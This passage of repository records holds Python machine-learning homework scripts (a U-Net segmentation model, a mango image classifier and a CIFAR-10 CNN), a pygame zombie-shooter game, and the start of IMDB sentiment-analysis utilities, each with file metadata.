data_list = sorted(os.listdir(path))\r\n img_itk = sitk.ReadImage(path + '/'+ data_list[0])\r\n flair = sitk.GetArrayFromImage(img_itk)\r\n data.append([flair])\r\n data = np.asarray(data, dtype=np.float16)\r\n return data\r\ndef load_train_label_data(path):\r\n train_label_dir = sorted(train_label_filelist)\r\n gt = []\r\n for p in tqdm(train_label_dir):\r\n data_list = sorted(os.listdir(path ))\r\n img_itk = sitk.ReadImage(path + '/'+ data_list[0])\r\n seg = sitk.GetArrayFromImage(img_itk)\r\n gt.append(seg)\r\n gt = np.asarray(gt, dtype=np.float16)\r\n return gt\r\ndata1 = load_train_data(train_image_path)\r\ngt1 = load_train_label_data(train_label_path)\r\nnp.save('data1', data1)\r\nnp.save('gt1',gt1)\r\n\r\n#測次檔案轉換\r\ndef load_test_data(path):\r\n test_image_dir = sorted(test_image_filelist)\r\n data = []\r\n for p in tqdm(test_image_dir):\r\n data_list = sorted(os.listdir(path))\r\n img_itk = sitk.ReadImage(path + '/'+ data_list[0])\r\n flair = sitk.GetArrayFromImage(img_itk)\r\n data.append([flair])\r\n data = np.asarray(data, dtype=np.float16)\r\n return data\r\n#data2 = load_test_data(test_image_path)\r\n#np.save('data2', data2)\r\n\r\n#load npy\r\ndata = np.load('C:/Users/User/PycharmProjects/shopee/data1.npy')\r\ndata = np.transpose(data,(0,2,3,4,1))\r\nX_train = data[:,30:60,30:150,30:150,:].reshape([-1,200,200,1])\r\nprint(X_train.shape)\r\ndata = np.load('C:/Users/User/PycharmProjects/shopee/gt1.npy')\r\ny_train = data[:,30:60,30:150,30:150].reshape([-1,200,200,1])\r\nprint(y_train.shape)\r\ndata = np.load('C:/Users/User/PycharmProjects/shopee/data2.npy')\r\ndata = np.transpose(data,(0,2,3,4,1))\r\nX_test = data[:,30:50,30:85,30:85,:].reshape([-1,200,200,1])\r\nprint(X_test.shape)\r\n\r\n#正規化\r\nfrom keras.utils import to_categorical\r\ny_train = to_categorical(y_train)\r\nX_train = (X_train-np.mean(X_train))/np.max(X_train)\r\nX_test = (X_test-np.mean(X_test))/np.max(X_test)\r\n\r\n#建構模型\r\nimport numpy as np\r\nimport os\r\nimport skimage.io as io\r\nimport skimage.transform as trans\r\nimport numpy as np\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\r\nfrom keras import backend as keras\r\ndef unet(pretrained_weights=None, input_size=(200, 200, 1)):\r\n inputs = Input(input_size)\r\n conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)\r\n conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\r\n conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\r\n conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)\r\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)\r\n conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)\r\n drop4 = Dropout(0.5)(conv4)\r\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\r\n\r\n conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\r\n conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\r\n drop5 = Dropout(0.5)(conv5)\r\n\r\n up6 = Conv2D(512, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(drop5))\r\n merge6 = concatenate([drop4, up6], axis=3)\r\n conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)\r\n conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)\r\n\r\n up7 = Conv2D(256, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(conv6))\r\n merge7 = concatenate([conv3, up7], axis=3)\r\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)\r\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)\r\n\r\n up8 = Conv2D(128, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(conv7))\r\n merge8 = concatenate([conv2, up8], axis=3)\r\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)\r\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)\r\n\r\n up9 = Conv2D(64, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n UpSampling2D(size=(2, 2))(conv8))\r\n merge9 = concatenate([conv1, up9], axis=3)\r\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)\r\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\r\n\r\n model = Model(input=inputs, output=conv10)\r\n\r\n model.compile(optimizer=Adam(lr=1e-4), loss='binary_crossentropy', metrics=['accuracy'])\r\n\r\n # model.summary()\r\n\r\n if (pretrained_weights):\r\n model.load_weights(pretrained_weights)\r\n\r\n return model\r\n#預測\r\n\r\n#\r\n" }, { "alpha_fraction": 0.6234708428382874, "alphanum_fraction": 0.6469416618347168, "avg_line_length": 27.79660987854004, "blob_id": "afd6ef9e6fc423525ef378980796518a5425218a", "content_id": "f185136ff130074cdc57422b6d31a3d9484fc647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7064, "license_type": "no_license", "max_line_length": 105, "num_lines": 236, "path": "/hw2_group6/hw2_group6_Mango.py", "repo_name": "Yi-YunSung/109-2MachineLearning", "src_encoding": "UTF-8", "text": "#匯入模組\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.utils import shuffle\r\n\r\nprint(os.listdir('/Users/User/Desktop/Data_Mango'))\r\nprint(os.listdir('/Users/User/Desktop/Data_Mango/Train_Image'))\r\n\r\n#讀取資料\r\ntrainPath = '/Users/User/Desktop/Data_Mango/Train_Image/'\r\ntestPath = '/Users/User/Desktop/Data_Mango/Test_Image/'\r\n\r\ntrainCSV = '/Users/User/Desktop/Data_Mango/train.csv'\r\ntestCSV = '/Users/User/Desktop/Data_Mango/Test.csv'\r\n\r\ntrainDF = pd.read_csv(trainCSV)\r\nprint(trainDF)\r\ntrainFiles = trainDF['image_id'].tolist()\r\ntrainClasses = trainDF['label'].tolist()\r\n\r\ntestDF = pd.read_csv(testCSV)\r\nprint(testDF)\r\ntestFiles = testDF['image_id'].tolist()\r\ntestClasses = testDF['label'].tolist()\r\n\r\nlabels = ['A', 'B', 'C']\r\n\r\n#圖片前處理\r\ndef plot_equilibre(equilibre, labels, title):\r\n plt.figure(figsize=(5,5))\r\n my_circle=plt.Circle( (0,0), 0.5, color='white')\r\n plt.pie(equilibre, labels=labels, colors=['red','green','blue'],autopct='%1.1f%%')\r\n p=plt.gcf()\r\n p.gca().add_artist(my_circle)\r\n plt.title(title)\r\n plt.show()\r\n\r\nequilibreTrain = []\r\n[equilibreTrain.append(trainClasses.count(label)) for label in labels]\r\n#print(equilibreTrain)\r\nplot_equilibre(equilibreTrain, labels, 'Train Data')\r\ndel equilibreTrain\r\n\r\nequilibreTest = []\r\n[equilibreTest.append(testClasses.count(label)) for label in labels]\r\n#print(equilibreTest)\r\nplot_equilibre(equilibreTest, labels, 'Test Data')\r\ndel equilibreTest\r\n\r\nTargetSize = (192, 144) # image ratio = 4:3\r\ndef prepare_image(filepath):\r\n img = cv2.imread(filepath)\r\n # get image height, width\r\n (h, w) = img.shape[:2]\r\n if (w<h): # rotate270\r\n # calculate the center of the image\r\n center = (w / 2, h / 2)\r\n M = cv2.getRotationMatrix2D(center, 270, 1.0)\r\n img = cv2.warpAffine(img, M, (h, w))\r\n img_resized = cv2.resize(img, TargetSize, interpolation=cv2.INTER_CUBIC)\r\n img_result = cv2.cvtColor(img_resized, cv2.COLOR_BGR2RGB)\r\n return img_result\r\n\r\n#plt.imshow(prepare_image(trainPath + trainFiles[1]))\r\n#plt.imshow(prepare_image(testPath + '/'+ testFiles[1]))\r\n\r\n\r\n'''\r\ntraining data\r\n'''\r\n#訓練資料\r\ntrainX = []\r\n[trainX.append(prepare_image(trainPath+file)) for file in trainFiles]\r\ntrainX = np.asarray(trainX)\r\nprint(trainX.shape)\r\n\r\n# data normalisation\r\ntrainX = trainX / 255.0\r\n\r\n# Convert Y_data from {'A','B','C'} to {0,1,2}\r\ntrainY = []\r\n[trainY.append(ord(trainClass) - 65) for trainClass in trainClasses]\r\n#print(trainY)\r\n\r\n# one-hot encoding\r\ntrainY = to_categorical(trainY)\r\n\r\n\r\n'''\r\ntesting data\r\n'''\r\ntestX = []\r\n[testX.append(prepare_image(testPath+file)) for file in testFiles]\r\ntestX = np.asarray(testX)\r\nprint(testX.shape)\r\n\r\n# data normalisation\r\ntestX = testX / 255.0\r\n\r\n# Convert Y_data from char to integer\r\ntestY = []\r\n[testY.append(ord(testClass) - 65) for testClass in testClasses]\r\n#print(testY)\r\n\r\n# one-hot encoding\r\ntestY = to_categorical(testY)\r\n\r\ntrainX, trainY = shuffle(trainX, trainY, random_state=42)\r\nnum_classes = 3\r\n\r\n'''\r\nbuild model\r\n'''\r\n\r\nfrom tensorflow.keras.models import Model\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, GlobalAveragePooling2D\r\nfrom tensorflow.keras.layers import Input, BatchNormalization, Activation, LeakyReLU, Concatenate\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\n\r\ninput_shape = trainX.shape[1:]\r\nprint(trainX.shape[1:])\r\n\r\n# Build Model\r\n\r\ninput_image = Input(shape=input_shape)\r\n# 1st Conv layer\r\nmodel = Conv2D(16, (3, 3), activation='relu', padding='same', input_shape=input_shape)(input_image)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 2nd Conv layer\r\nmodel = Conv2D(32, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 3rd Conv layer\r\nmodel = Conv2D(64, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 4th Conv layer\r\nmodel = Conv2D(128, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# 5th Conv layer\r\nmodel = Conv2D(256, (3, 3), activation='relu', padding='same')(model)\r\nmodel = MaxPooling2D((2, 2),padding='same')(model)\r\n# FC layers\r\nmodel = Flatten()(model)\r\n\r\n#model = Dense(1024, kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01))(model)\r\nmodel = Dense(1024)(model)\r\n#model = Dropout(0.2)(model)\r\n\r\n#model = Dense(64, kernel_regularizer=l2(0.01), bias_regularizer=l2(0.01))(model)\r\nmodel = Dense(64)(model)\r\n#model = Dropout(0.2)(model)\r\n\r\noutput= Dense(num_classes, activation='softmax')(model)\r\n\r\nmodel = Model(inputs=[input_image], outputs=[output])\r\n\r\nprint(model.summary())\r\n\r\n# Compile Model\r\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n'''\r\ntrain model\r\n'''\r\n\r\nbatch_size = 256\r\nnum_epochs = 20\r\n\r\n# Train Model\r\nhistory = model.fit(trainX,trainY,batch_size=batch_size,epochs=num_epochs) #, callbacks=[checkpoint])\r\n\r\npredY = model.predict(testX)\r\ny_pred = np.argmax(predY,axis=1)\r\ny_actual = np.argmax(testY,axis=1)\r\n#y_label= [labels[k] for k in y_pred]\r\ncm = confusion_matrix(y_actual, y_pred)\r\nprint(cm)\r\n\r\n'''\r\nconfusion matrix\r\n'''\r\n\r\nimport itertools\r\n\r\n\r\ndef plot_confusion_matrix(cm,\r\n target_names,\r\n title='Confusion matrix',\r\n cmap=None,\r\n normalize=True):\r\n accuracy = np.trace(cm) / float(np.sum(cm))\r\n misclass = 1 - accuracy\r\n\r\n if cmap is None:\r\n cmap = plt.get_cmap('Blues')\r\n\r\n plt.figure(figsize=(8, 6))\r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title)\r\n plt.colorbar()\r\n\r\n if target_names is not None:\r\n tick_marks = np.arange(len(target_names))\r\n plt.xticks(tick_marks, target_names, rotation=45)\r\n plt.yticks(tick_marks, target_names)\r\n\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2\r\n\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n if normalize:\r\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n else:\r\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n\r\n plt.tight_layout()\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label\\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))\r\n plt.show()\r\n\r\nplot_confusion_matrix(cm,\r\n normalize=False,\r\n target_names = labels,\r\n title=\"Confusion Matrix, not Normalized\")\r\n\r\nprint(model.evaluate(trainX, trainY))\r\n\r\nprint(classification_report(y_actual, y_pred, target_names=labels))" }, { "alpha_fraction": 0.6226672530174255, "alphanum_fraction": 0.6458807587623596, "avg_line_length": 30.562963485717773, "blob_id": "e393f5041037a919ff443a2b9ea1d7114c48c773", "content_id": "f1810c1eb5cdb58e9624411ac095b08c0ca4e3f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5048, "license_type": "no_license", "max_line_length": 71, "num_lines": 135, "path": "/hw2_group6/hw2_group6_Cifar10.py", "repo_name": "Yi-YunSung/109-2MachineLearning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\r\nimport tensorflow\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.datasets import cifar10\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\nfrom tensorflow.keras.utils import to_categorical\r\nimport os\r\nimport numpy as np\r\n\r\nbatch_size = 32\r\nnum_classes = 10\r\nepochs = 30\r\ndata_augmentation = True\r\nnum_predictions = 20\r\nsave_dir = os.path.join(os.getcwd(), 'saved_models')\r\nmodel_name = 'keras_cifar10_trained_model.h5'\r\n\r\n#將資料分成訓練和測試集\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\nprint('x_train shape:', x_train.shape)\r\nprint(x_train.shape[0], 'train samples')\r\nprint(x_test.shape[0], 'test samples')\r\n\r\n# 將類向量轉成二進制\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, (3, 3), padding='same',\r\n input_shape=x_train.shape[1:]))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Conv2D(32, (3, 3)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\n\r\nmodel.add(Conv2D(64, (3, 3), padding='same'))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Conv2D(64, (3, 3)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(512))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes))\r\nmodel.add(Activation('softmax'))\r\n\r\n# 初始化優化器RMSprop\r\nopt = tensorflow.keras.optimizers.RMSprop(lr=0.0001, decay=1e-6)\r\n\r\n# 利用RMSprop編譯\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer=opt,\r\n metrics=['accuracy'])\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\nif not data_augmentation:\r\n print('Not using data augmentation.')\r\n model.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n validation_data=(x_test, y_test),\r\n shuffle=True)\r\nelse:\r\n print('Using real-time data augmentation.')\r\n # 这一步将进行数据处理和实时数据增益。data augmentation:\r\n datagen = ImageDataGenerator(\r\n featurewise_center=False, # 将整个数据集的均值设为0\r\n samplewise_center=False, # 将每个样本的均值设为0\r\n featurewise_std_normalization=False, # 将输入除以整个数据集的标准差\r\n samplewise_std_normalization=False, # 将输入除以其标准差\r\n zca_whitening=False, # 运用 ZCA 白化\r\n zca_epsilon=1e-06, # ZCA 白化的 epsilon值\r\n rotation_range=0, # 随机旋转图像范围 (角度, 0 to 180)\r\n # 随机水平移动图像 (总宽度的百分比)\r\n width_shift_range=0.1,\r\n # 随机垂直移动图像 (总高度的百分比)\r\n height_shift_range=0.1,\r\n shear_range=0., # 设置随机裁剪范围\r\n zoom_range=0., # 设置随机放大范围\r\n channel_shift_range=0., # 设置随机通道切换的范围\r\n # 设置填充输入边界之外的点的模式\r\n fill_mode='nearest',\r\n cval=0., # 在 fill_mode = \"constant\" 时使用的值\r\n horizontal_flip=True, # 随机水平翻转图像\r\n vertical_flip=False, # 随机垂直翻转图像\r\n # 设置缩放因子 (在其他转换之前使用)\r\n rescale=None,\r\n # 设置将应用于每一个输入的函数\r\n preprocessing_function=None,\r\n # 图像数据格式,\"channels_first\" 或 \"channels_last\" 之一\r\n data_format=None,\r\n # 保留用于验证的图像比例(严格在0和1之间)\r\n validation_split=0.0)\r\n\r\n # 计算特征标准化所需的计算量\r\n # (如果应用 ZCA 白化,则为 std,mean和主成分).\r\n datagen.fit(x_train)\r\n\r\n # 利用由 datagen.flow() 生成的批来训练模型\r\n model.fit_generator(datagen.flow(x_train, y_train,\r\n batch_size=batch_size),\r\n epochs=epochs,\r\n validation_data=(x_test, y_test),\r\n workers=4)\r\n\r\n# 保存模型和权重\r\nif not os.path.isdir(save_dir):\r\n os.makedirs(save_dir)\r\nmodel_path = os.path.join(save_dir, model_name)\r\nmodel.save(model_path)\r\nprint('Saved trained model at %s ' % model_path)\r\n\r\n# 评估训练模型\r\nscores = model.evaluate(x_test, y_test, verbose=1)\r\nprint('Test loss:', scores[0])\r\nprint('Test accuracy:', scores[1])\r\n\r\n#預測測試資料的labels\r\ntestPred = np.argmax(model.predict(x_test), axis=1)\r\n\r\n#算出混淆矩陣\r\nfrom sklearn.metrics import confusion_matrix, classification_report\r\ntestLabels_class = np.argmax(y_test, axis=1)\r\nprint(classification_report(testLabels_class, testPred))" } ]
3
zom-rpg/the_game
https://github.com/zom-rpg/the_game
5b00e321406ac5f42241c3928463bed398ae6592
055b17d43f519565c2e42c578558ee6bdab9db07
25f9435cc627fd7f0cc3eb5f6d087a99193f9718
refs/heads/master
2016-08-06T17:23:22.074242
2013-02-21T19:11:03
2013-02-21T19:11:03
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 5.75, "blob_id": "8f169cfa5ae77ea71abf489e7d25e13faed8403b", "content_id": "3299d7389ac7cfa93062f522b812fb810a1db9cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 26, "license_type": "no_license", "max_line_length": 8, "num_lines": 4, "path": "/README.md", "repo_name": "zom-rpg/the_game", "src_encoding": "UTF-8", "text": "the_game\n========\n\nZOM-RPG" }, { "alpha_fraction": 0.5619877576828003, "alphanum_fraction": 0.5980226397514343, "avg_line_length": 29.569721221923828, "blob_id": "6a32e4501045673c7afa5165e072a921fbe3d8f9", "content_id": "c5d203502db05fdc555f37f12fec7732ab6a9b03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7687, "license_type": "no_license", "max_line_length": 79, "num_lines": 251, "path": "/Init-test/zom-rpg-sprite-test.py", "repo_name": "zom-rpg/the_game", "src_encoding": "UTF-8", "text": "# Zombie Mob Game\n# Chapter 8\n\nimport itertools, sys, time, random, math, pygame\nfrom pygame.locals import *\nfrom MyLibrary import *\n\nclass Bullet():\n def __init__(self, position):\n self.alive = True\n self.color = (250,20,20)\n self.position = Point(position.x,position.y)\n self.velocity = Point(0,0)\n self.rect = Rect(0,0,4,4)\n\n def update(self,ticks):\n self.position.x += self.velocity.x * 10.0\n self.position.y += self.velocity.y * 10.0\n if self.position.x < 0 or self.position.x > 800 \\\n or self.position.y < 0 or self.position.y > 600:\n self.alive = False\n self.rect = Rect(self.position.x, self.position.y, 4, 4)\n\n def draw(self,surface):\n pos = (int(self.position.x), int(self.position.y))\n pygame.draw.circle(surface, self.color, pos, 4, 0)\n\ndef fire_gun(direction):\n position = Point(player.X+40, player.Y+40)\n bullet = Bullet(position)\n bullet.velocity = calc_velocity(direction, 2.5)\n bullets.append(bullet)\n\ndef calc_velocity(direction, vel=1.0):\n velocity = Point(0,0)\n if direction == 0: #north\n velocity.y = -vel\n elif direction == 2: #east\n velocity.x = vel\n elif direction == 4: #south\n velocity.y = vel\n elif direction == 6: #west\n velocity.x = -vel\n return velocity\n\ndef reverse_direction(sprite):\n if sprite.direction == 0:\n sprite.direction = 4\n elif sprite.direction == 2:\n sprite.direction = 6\n elif sprite.direction == 4:\n sprite.direction = 0\n elif sprite.direction == 6:\n sprite.direction = 2\n\n#main program begins\nglobal bullets\nbullets = list()\npygame.init()\nscreen = pygame.display.set_mode((800,600))\nbackbuffer = pygame.Surface((800,600))\npygame.display.set_caption(\"Collision Demo\")\nfont = pygame.font.Font(None, 36)\ntimer = pygame.time.Clock()\n\n#create sprite groups\nplayer_group = pygame.sprite.Group()\nzombie_group = pygame.sprite.Group()\nhealth_group = pygame.sprite.Group()\nsupplies_group = pygame.sprite.Group()\n\n\n#create the player sprite\nplayer = MySprite()\nplayer.load(\"Walk.png\", 88.8, 88.8, 9)\nplayer.position = 80, 80\nplayer.direction = 4\nplayer_group.add(player)\nfire_timer = 0\n\n#create the zombie sprite\nzombie_image = pygame.image.load(\"zombie walk.png\").convert_alpha()\nfor n in range(0, 10):\n zombie = MySprite()\n zombie.load(\"zombie walk.png\", 96, 96, 8)\n zombie.position = random.randint(0,700), random.randint(0,500)\n zombie.direction = random.randint(0,3) * 2\n zombie_group.add(zombie)\n\n#create heath sprite\nhealth = MySprite()\nhealth.load(\"health.png\", 40, 40, 1)\nhealth.position = 400,300\nhealth_group.add(health)\n\n#create supply sprite\nsupplies = MySprite()\nsupplies.load(\"supplycrate.png\", 40, 40, 1)\nsupplies.position = 100,100\nsupplies_group.add(supplies)\n\n#game variables\ngame_over = False\nplayer_moving = False\nplayer_health = 100\nplayer_score = 0\n\n\n#repeating loop\nwhile True:\n timer.tick(30)\n ticks = pygame.time.get_ticks()\n\n for event in pygame.event.get():\n if event.type == QUIT: sys.exit()\n keys = pygame.key.get_pressed()\n if keys[K_ESCAPE]: sys.exit()\n elif keys[K_UP] or keys[K_w]:\n player.direction = 0\n player_moving = True\n elif keys[K_RIGHT] or keys[K_d]:\n player.direction = 2\n player_moving = True\n elif keys[K_DOWN] or keys[K_s]:\n player.direction = 4\n player_moving = True\n elif keys[K_LEFT] or keys[K_a]:\n player.direction = 6\n player_moving = True\n else:\n player_moving = False\n if keys[K_j]:\n if fire_timer == 0:\n fire_gun(player.direction)\n fire_timer = 100\n elif fire_timer > 0:\n fire_timer -= 10\n\n\n if not game_over:\n #set animation frames based on player's direction\n player.first_frame = player.direction * player.columns\n player.last_frame = player.first_frame + player.columns-1\n if player.frame < player.first_frame:\n player.frame = player.first_frame\n\n if not player_moving:\n #stop animating when player is not pressing a key\n player.frame = player.first_frame = player.last_frame\n else:\n #move player in direction \n player.velocity = calc_velocity(player.direction, 2.5)\n player.velocity.x *= 2.5\n player.velocity.y *= 2.5\n\n #update player sprite\n player_group.update(ticks, 50)\n\n #manually move the player\n if player_moving:\n player.X += player.velocity.x\n player.Y += player.velocity.y\n if player.X < 0: player.X = 0\n elif player.X > 700: player.X = 700\n if player.Y < 0: player.Y = 0\n elif player.Y > 500: player.Y = 500\n\n #update zombie sprites\n zombie_group.update(ticks, 50)\n\n #manually iterate through all the zombies\n for z in zombie_group:\n #set the zombie's animation range\n z.first_frame = z.direction * z.columns\n z.last_frame = z.first_frame + z.columns-1\n if z.frame < z.first_frame:\n z.frame = z.first_frame\n z.velocity = calc_velocity(z.direction)\n\n #keep the zombie on the screen \n z.X += z.velocity.x\n z.Y += z.velocity.y\n if z.X < 0 or z.X > 700 or z.Y < 0 or z.Y > 500:\n reverse_direction(z)\n \n\n #check for collision with zombies\n attacker = None\n attacker = pygame.sprite.spritecollideany(player, zombie_group)\n if attacker != None:\n #we got a hit, now do a more precise check\n if pygame.sprite.collide_rect_ratio(0.5)(player,attacker):\n player_health -= 10\n if attacker.X < player.X: attacker.X -= 10\n elif attacker.X > player.X: attacker.X += 10\n else:\n attacker = None\n\n #update the health drop\n health_group.update(ticks, 50)\n\n #check for collision with health\n if pygame.sprite.collide_rect_ratio(0.5)(player,health):\n player_health += 30\n if player_health > 100: player_health = 100\n health.X = random.randint(0,700)\n health.Y = random.randint(0,500)\n \n supplies_group.update(ticks, 50)\n \n if pygame.sprite.collide_rect_ratio(0.5)(player,supplies):\n player_score += 1\n supplies.X = random.randint(0,700)\n supplies.Y = random.randint(0,500)\n \n #update bullets\n for bullet in bullets:\n bullet.update(ticks)\n victim = None\n victim = pygame.sprite.spritecollideany(bullet, zombie_group)\n if victim != None:\n bullet.alive = False\n bullets.remove(bullet)\n zombie_group.remove(victim)\n \n\n #is player dead?\n if player_health <= 0:\n game_over = True\n\n\n #clear the screen\n backbuffer.fill((50,50,100))\n\n #draw sprites\n supplies_group.draw(backbuffer)\n health_group.draw(backbuffer)\n zombie_group.draw(backbuffer)\n player_group.draw(backbuffer)\n for bullet in bullets:\n bullet.draw(backbuffer)\n screen.blit(backbuffer, (0,0))\n\n #set up UI items\n pygame.draw.rect(screen, (50,150,50,180), Rect(300,570,player_health*2,25))\n pygame.draw.rect(screen, (100,200,100,180), Rect(300,570,200,25), 2)\n print_text(font, 0, 0, \"SUPPLIES COLLECTED: \" + str(player_score))\n if game_over:\n print_text(font, 300, 100, \"G A M E O V E R\")\n \n pygame.display.update()\n\n \n" } ]
2
roseway/sentiment-analysis
https://github.com/roseway/sentiment-analysis
d41a1bdb4f92a51db3aedbfa705cc4a232b6eb6c
e0f26bfb02a907b43fd9492fd01f9ccd0991eee6
28cd68f8ec3a994f45a56cf1b757582651476cc3
refs/heads/master
2020-04-11T11:38:23.128794
2018-12-14T08:43:29
2018-12-14T08:43:29
161,754,756
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.74349445104599, "alphanum_fraction": 0.7583643198013306, "avg_line_length": 66, "blob_id": "0d606dbfd27b860015ac2a9caa22cefd8e10c8f7", "content_id": "195a44a204cdc31047c5fa0421a496bb46692fb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 269, "license_type": "no_license", "max_line_length": 95, "num_lines": 4, "path": "/README.MD", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "1. Download imdb sentiment analysis dataset from http://ai.stanford.edu/~amaas/data/sentiment/.\n2. Download GloVe word embedding from https://nlp.stanford.edu/projects/glove/.\n3. Modify the paths in `main.py` accordingly.\n4. Run `extract_vocab.py`, then run `main.py`\n\n" }, { "alpha_fraction": 0.5631458163261414, "alphanum_fraction": 0.5700344443321228, "avg_line_length": 26.21875, "blob_id": "57965c2d3b311676fde8964bac229af73bbec310", "content_id": "669e247d43b3a1da569717b7c1bf4161be84c982", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1742, "license_type": "no_license", "max_line_length": 60, "num_lines": 64, "path": "/utils.py", "repo_name": "roseway/sentiment-analysis", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom string import punctuation\nfrom os import listdir\n\n\ndef load_emb(filename, vocab):\n f = open(filename, 'r', encoding='UTF-8')\n lines = f.readlines()\n f.close()\n vocab_size = len(vocab) + 1\n wordlist = np.zeros((vocab_size, 300))\n embedding = dict()\n for line in lines:\n x = line.split()\n embedding[x[0]] = np.asarray(x[1:], dtype='float32')\n for word, i in vocab.items():\n vector = embedding.get(word)\n if vector is not None:\n wordlist[i] = vector\n return wordlist\n\n\ndef load_doc(filename):\n # open the file as read only\n file = open(filename, 'r', encoding='UTF-8')\n # read all text\n text = file.read()\n # close the file\n file.close()\n return text\n\n\ndef clean_doc(doc, vocab):\n # split into tokens by white space\n doc = doc.replace('<br 